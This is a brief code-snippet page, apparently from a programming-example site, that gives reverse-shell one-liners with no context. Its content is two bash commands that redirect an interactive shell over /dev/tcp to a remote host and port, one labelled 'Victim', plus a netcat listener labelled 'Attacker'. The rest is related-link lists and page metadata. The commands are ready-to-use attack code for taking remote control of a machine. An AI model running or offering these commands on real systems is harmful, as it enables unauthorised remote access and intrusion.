Horje
how to reverse shell Code Example
reverse shell bash
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
how to reverse shell
/bin/bash -i > /dev/tcp/0.0.0.0/9000 0<&1 2>&1 # Victim
how to reverse shell
nc -l -p 9000 -vvv # Attacker




Shell

Related
run bat file with arguments Code Example run bat file with arguments Code Example
ubuntu export path Code Example ubuntu export path Code Example
merge gif with mp4 using ffmpeg Code Example merge gif with mp4 using ffmpeg Code Example
coverage pytest Code Example coverage pytest Code Example
git clone same name Code Example git clone same name Code Example

Type:
Code Example
Category:
Coding
Sub Category:
Code Example
Uploaded by:
Admin
Views:
11